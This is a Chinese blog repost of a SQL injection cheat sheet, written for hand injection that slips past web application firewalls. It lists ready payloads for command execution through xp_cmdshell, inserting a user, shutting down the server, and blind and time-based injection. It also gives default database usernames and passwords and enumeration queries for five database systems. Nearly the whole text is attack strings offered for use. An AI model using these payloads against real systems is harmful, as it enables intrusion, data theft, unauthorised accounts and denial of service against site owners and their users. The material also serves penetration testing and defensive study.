• 常见的SQL注入检测语句(转载)

    0x00 前言

         现在很多WAF都能拦截sqlmap、havij 等注入工具的发包注入,所以这时我们需要在浏览器上使用hackerbar 进行手工注入,或者说是手工绕过注入攻击

    0x01 发现SQL 注入

    1 查询语法中断:单引号(  ‘  ), 双引号( “  )

    2 SQL注释注入:双连字符  (-- ), 散列 (# ), 注释( /* )

    3 扩展/附加查询: 分号 (  ;  )

    4 注射/绕过过滤器:使用 CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL  来转换上面的注入字符

    0x02 常用的SQL注入命令

    1 Union注入:Union all select NULL (Multiple columns)

    2 命令执行:1;exec master..xp_cmdshell ‘dir’>C:inetpubwwwrootdir.txt’ OR master.dbo.xp_cmdshell

    3 加载文件:LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

    4 添加用户:1’; insert into users values(‘nto’,’nto123’)

    5 DOS攻击:1’;shutdown –

    6 获取字段: select name from syscolumns where id =(select id FROM sysobjects where name = ‘target table name’) – (Union can help)Co

    0x02 常用的SQL盲注命令

    1 快速检测:AND 1=1, AND 1=0

    2 查询用户:1+AND+USER_NAME()=’dbo’

    3 延时注入:1;waitfor+delay+’0:0:10’

    4 检查SA用户:SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

    5 跳转/休眠:BENCHMARK(TIMES, TASK), pg_sleep(10)

    0x03 数据库的默认用户名

    Oracle                  scott/tiger, dbsnmp/dbsnmp
    MySQL                  mysql/<BLANK>, root/<BLANK>
    PostgreSQL        postgres/<BLANK>
    MS-SQL               sa/<BLANK>
    DB2                     db2admin/db2admin

    0x04 常见的后台数据库SQL注入命令

    1 MySQL

    Grab                              @@version
    Users                            * from mysql.user
    Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
    Database                    distinct(db) FROM mysql.db
    Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ AND table_name == ‘<TABLENAME>’
    Running User               user()

    2 MS-SQL
    Grab version           @@version
    Users                      name FROM master..syslogins
    Tables                     name FROM master..sysobjects WHERE xtype = ‘U’
    Database                name FROM master..sysdatabases;
    Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘<TABLENAME’)
    Running User        DB_NAME()

    3 Oracle
    Grab  version          table v$version compare with ‘Oracle%’
    Users                      * from dba_users
    Tables                      table_name from all_tables
    Database                distinct owner from all_tables
    Columns                 column_name from all_tab_columns where table_name=‘<TABLENAME>
    Running User        user from dual

    4 IBM DB2
    Grab version          Versionnumber from sysibm.sysversions;
    Users                      user from sysibm.sysdummy1
    Tables                    name from sysibm.systables
    Database               schemaname from syscat.schemata
    Columns                name, tbname, coltype from sysibm.syscolumns
    Running User        user from sysibm.sysdummy1

    5 PostgreSQL
    Grab version           version()
    Users                     * from pg_user
    Database                datname FROM pg_database
    Running User         user;

    链接是:https://blog.csdn.net/qq_29277155/article/details/51248089
  • 相关阅读:
    I2C协议
    SPI
    学习高速PCB设计,这些走线方式你要知道! 高速射频百花潭 20220121 08:53
    ORCAD中,怎么一次性去掉所有元器件下面的下划线呢
    PCB中波长和真空中波长的关系
    I2S
    解决 Vue 重复点击相同路由,出现 Uncaught (in promise) NavigationDuplicated: Avoided redundant navigation 问题
    vue2搭建h5页面
    git提交代码
    vue报错解决方案
  • 原文地址:https://www.cnblogs.com/linxiu-0925/p/9071786.html
Copyright © 2020-2023  润新知